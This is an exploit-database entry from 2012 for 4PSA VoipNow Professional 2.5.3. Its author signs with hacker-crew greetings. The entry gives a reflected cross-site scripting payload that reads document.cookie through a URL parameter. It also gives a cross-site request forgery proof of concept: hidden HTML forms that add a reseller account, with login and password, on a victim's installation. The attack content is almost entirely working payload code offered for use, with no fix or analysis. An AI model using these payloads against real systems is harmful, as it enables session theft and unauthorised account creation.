4PSA VoipNow Professional 2.5.3 Reflected XSS / CSRF (Add Reseller) Vulnerabilities



EKU-ID: 2219 CVE: OSVDB-ID:
Author: Aboud-el Published: 2012-06-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


4PSA VoipNow Professional 2.5.3 Reflected XSS / CSRF (Add Reseller) Vulnerabilities
==================================================================================

##################################################################################
.:. Author         :  Aboud-el [aboud_el@hotmail.com]
.:. Script         : http://www.4psa.com/
.:. Gr34T$ T0 [AtT4CKxT3rR0r1ST]
##################################################################################

===[ Exploit ]===

Reflected XSS
=============

Tested On Demo: http://automation.4psa.com/index.php

http://SITE/index.php?nsextt='"<script>alert(document.cookie)</script>


CSRF (Add Reseller)
===================

Tested On Demo: http://voipnow2demo.4psa.com/index.php

<form method="POST" name="form0" action="http://SITE/content.php?screen=resellers/edit_reseller">
<input type="hidden" name="edit_reseller_cmd" value="1"/>
<input type="hidden" name="client_template_id" value="2"/>
<input type="hidden" name="company" value="....."/>
<input type="hidden" name="name" value="....."/>
<input type="hidden" name="login" value="....."/>
<input type="hidden" name="password" value="....."/>
<input type="hidden" name="cpassword" value="....."/>
<input type="hidden" name="phone" value="....."/>
<input type="hidden" name="fax" value="....."/>
<input type="hidden" name="email" value="....."/>
<input type="hidden" name="address" value="....."/>
<input type="hidden" name="city" value="....."/>
<input type="hidden" name="pcode" value="00961"/>
<input type="hidden" name="country_id" value="122"/>
<input type="hidden" name="region_id" value="2073"/>
<input type="hidden" name="timezone_id" value="197"/>
<input type="hidden" name="language" value="en"/>
<input type="hidden" name="notes" value="....."/>
<input type="hidden" name="billing_plan_id" value="274"/>
<input type="hidden" name="charging_identifier" value="....."/>
</form>
<form method="GET" name="form1" action="http://SITE/content.php?screen=resellers/resellers&">
<input type="hidden" name="name" value="value"/>
</form>

</body>
</html>

##################################################################################